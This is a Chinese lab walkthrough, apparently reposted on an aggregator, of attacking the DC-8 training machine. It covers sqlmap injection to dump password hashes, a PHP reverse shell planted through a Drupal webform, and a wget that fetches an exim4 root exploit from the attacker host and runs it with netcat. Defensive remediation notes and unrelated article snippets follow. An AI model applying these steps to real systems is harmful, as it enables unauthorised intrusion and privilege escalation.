DC-8渗透测试复现

DC-8渗透测试复现

目的:

获取最高权限以及flag

过程:

信息打点--sql注入- 命令执行反弹shell-exim4提权

环境:

攻击机:kali(192.168.85.137)

靶机:DC_3(192.168.85.140)

复现:
一.信息收集

nmap -sP 192.168.85.0/24
或者:
arp-scan -l

 进一步扫描端口 发现22端口和80网页端口开放

登入网站得到cms为D7 

 

AWVS扫描发现sql注入漏洞

 
二.寻找漏洞以及漏洞利用 

我们直接sqlmap一把梭 得到库名

sqlmap -u '192.168.85.140/?nid=1' --batch  --current-db

表名

 

 看用户账号密码以及权限

出现blank即是 等级不够 加等级

sqlmap -u '192.168.85.140/?nid=1' --batch --level=5 --risk=5  -D 'd7db' -T 'users' -C'name,pass,uid' -dump

 得到用户账号密码

| admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1   |
| john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 2 

有点像hash 解密 抛到在线网站解密失败 那估计就是john解密,将用户的密码保存 然后使用 john password 即可获得密码

 

turtle 应该是john密码   即 john/turtle 

进行ssh连接失败

         

 尝试登陆http://192.168.85.140/user/login 

继续摸索发现在WEBFORM处可以编辑并执行PHP代码 

 上传反弹shell

 保存后然后view进行发送 即可反弹shell

交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

在网站数据配置发现了数据库账号密码

 

登入发现是mariaDB数据库 ,登入进去也没找到什么有用的东西 跟注入的时候得到的数据库一样

三.提权 

查看能提权的命令

 发现 chfn和exim4提权 查看linux版本为4.9

linux版本为4.9那chfn提权就使用不了了

 换 exim4吧 kali直接搜漏洞

把它复制到 网站目录下 然后 www-data那边在/tmp目录下进行下载 当然你可以开启http服务 

/tmp 
wget 192.168.85.137:80/wenda.sh

 

下载完之后 查看文件的权限 发现只可读 修改文件权限为www-data可写

然后看sh文件的 使用方法

执行下面命令 (如果提权失败 建议在攻击机的shell脚本里面添加:set ff=unix 因为linux只能执行格式为unix格式的脚本)

./wenda.sh -m netcat

获得root权限以及flag

 修复:

1.关闭22ssh连接端口

2.利用参数化的查询阻止 SQL 注入,应用程序开发人员应避免通过转义或删除特殊字符(攻击者可能会利用来绕过此类保护的一些编码技巧)来清理输入内容,并坚持使用参数化查询,以避免出现 SQL 注入漏洞

3.过滤危险命令执行函数 ,客户端提交的变量在进入执行命令函数前要做好过滤和检测。

4.取消能够提取的shell命令

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/824289.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Golang:三种引号详解-单引号、双引号、反引号

Golang限定字符或者字符串一共三种引号: 单引号(),单个字符,更类似于C语言中的char类型, 双引号("") ,字符串,单行的,多个字符(字母数字)。 反引…

在报表控件 FastReport .NET 中使用 PageCreate 事件

FastReport Business Graphics .NET,是一款基于fastreport报表开发控件的商业图形库,借助 FastReport 商业图形库,您可以可视化不同的分层数据,构建业务图表以进行进一步分析和决策。利用数据呈现领域专家针对 .NET 7、.NET Core、…

栈和队列——数据结构学习笔记

栈和队列 栈(Stack) 定义与特点 栈是一种特殊的线性表,只能从一端进行插入和删除——>后进后出 LIFO结构 表尾(an) 称为栈顶Top 表头(a1)称为栈底Base 插入元素到栈顶的操作称为入栈 删除栈顶最后一个元素的操作称为出栈 抽象类型定义 ADT Stack{ 数据对…

编译OpenWRT固件

前言 编译环境,我是使用Ubuntu16.04.07 LTS 64位版 1.安装Ubuntu16.04.07 LTS 64 Ubuntu16.04.07 LTS 64安装的时候会出现一个bug,如果开始安装界面选了中文之后就会出现 提示错误信息:无法安装busybox-initramfs,向目标系统中…

openlayers 入门教程(六):controls 篇

目录 一、常用的控件 二、使用控件方法 三、添加删除control 的基本方法 四、control示例 1 比例尺 - ScaleLine 2 鹰眼/缩小图 - OverviewMap 3 全屏 - FullScreen 4 版权信息 - Attribution 5 旋转地图 - Rotate 6 放大缩小 - Zoom 7 缩放滑块控件 - ZoomSlider …

【Day 1】HTML 与 CSS

1 前端 网站的工作流程: 首先我们需要通过浏览器访问发布到前端服务器中的前端程序,这时候前端程序会将前端代码返回给浏览器浏览器得到前端代码,此时浏览器会将前端代码进行解析,然后展示到浏览器的窗口中,这时候我…

pwn - 零基础ROP之Android ARM 32位篇(新修订)

一、环境搭建 安装ndk r10e,必须得这个版本,其他版本可能导致 -fno-stack-protector 不生效! r10e Darwin: https://dl.google.com/android/repository/android-ndk-r10e-darwin-x86_64.zipLinux: https://dl.google.com/android/repository/android-ndk-r10e-linux-x86_6…

51-41 Stable Video Diffusion,高质量视频生成新时代

23年11月,Stability AI公司公开了稳定视频扩散模型Stable Video Diffusion(SVD)的代码和权重,视频生成迎来了新时代。SVD是一种潜在扩散模型,支持文本生成视频、图像生成视频以及物体多视角3D合成。从工程角度来看,本文主要提出了…

Real3DPortrait照片对口型,数字人,音频/视频驱动数字人

先看效果 上传一张图片和一段音频,照片如下: 合成后效果如下: 照片对口型-音频驱动 支持音频驱动和视频驱动,视频可以使照片有参照视频中的口型和和动作。 项目地址 https://github.com/yerfor/Real3DPortrait 我的环境 win…

[网络安全]-059-安全大模型以及训练数据集

Contents Tools IntegratedAuditReconnaissanceOffensiveDetectingPreventingSocial EngineeringReverse EngineeringInvestigationFixAssessmentCases ExperimentalAcademicB

真有立即做出40+BI零售数据分析报表的方案?

有,奥威BI零售数据分析方案是一套标准化的BI方案,预设零售数据分析模型和BI报表,点击应用后,将自动从系统中取数,并根据方案的预设计算分析指标、分析数据,并生成让人快速理解数据情况的BI数据可视化报表。…

Spark/SparkSQL读取Hadoop LZO文件概述

一、前置配置 IDEA Maven安装配置 Scala(可选) Java Hadoop.dll(可能需要,具体看有无相关错误信息) hadoop-lzo-0.xx.xx.jar(如果你的版本过高,需要到官网下载高版本,mvnrepository仓…

服务器中毒怎么办?企业数据安全需重视

互联网企业: 广义的互联网企业是指以计算机网络技术为基础,利用网络平台提供服务并因此获得收入的企业。广义的互联网企业可以分为:基础层互联网企业、服务层互联网企业、终端层互联网企业。 狭义的互联网企业是指在互联网上注册域名,建立网…

react15升级17问题记录

,当前旧项目主要依赖版本介绍:这里只贴出重要依赖包的旧版本做展示,可以看到版本都相当落后了,升级的话会涉及一些API以及依赖的修改或者弃用 次文章只记录当前项目使用,其他项目不一定通用 {"react": "^15.6.1&q…

Lua语言 备查

开发工具 1.SciTE (入门级) IDEA lua (商业级) 基础 注释 --单行注释 a "hello" --a是一个标识符号--多行注释 --[[这是多行注释]]--连接符 -- .. str 123..456变量 变量类型可以随意改变 数字开头会报错 五种基本…

postman 调试 传base64字符串 原来选xml

上个图 工具类 package org.springblade.common.utils;import com.alibaba.fastjson.JSONObject; import org.springblade.modules.tc.mas.Submit;import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStrea…

【FreeRTOS】使用CubeMX快速移植FreeRTOS工程到蓝桥杯开发板(STM32G431RBT6)

使用CubeMX快速创建FreeRTOS工程到蓝桥杯开发板(STM32G431RBT6) CubeMX配置CubeMX基础工程的配置☆FreeRTOS相关配置FreeRTOS配置选项卡的解释 软件工程架构与程序设计小综合:任务的创建删除、挂起与恢复设计cubexMX配置创建任务软件程序设计…

python怎么连接oracle

一:弄清版本,最重要!!! 首先安装配置时,必须把握一个点,就是版本一致!包括:系统版本,python版本,oracle客户端的版本,cx_Oracle的版本…

基于go+vue的多人在线聊天的im系统

基于govue的多人在线聊天的im系统 文章目录 基于govue的多人在线聊天的im系统一、前端部分二、后端部分1、中间件middleware设计jwt和cors2、配置文件设计3、Mysql和Redis连接4、路由设计5、核心功能设计 一、前端部分 打算优化一下界面,正在开发中。。。 二、后端…

OpenHarmony实战开发-如何使用Navigation实现多设备适配。

介绍 在应用开发时,一个应用需要适配多终端的设备,使用Navigation的mode属性来实现一套代码,多终端适配。 效果图预览 使用说明 将程序运行在折叠屏手机或者平板上观看适配效果。 实现思路 本例涉及的关键特性和实现方案如下&#xff1a…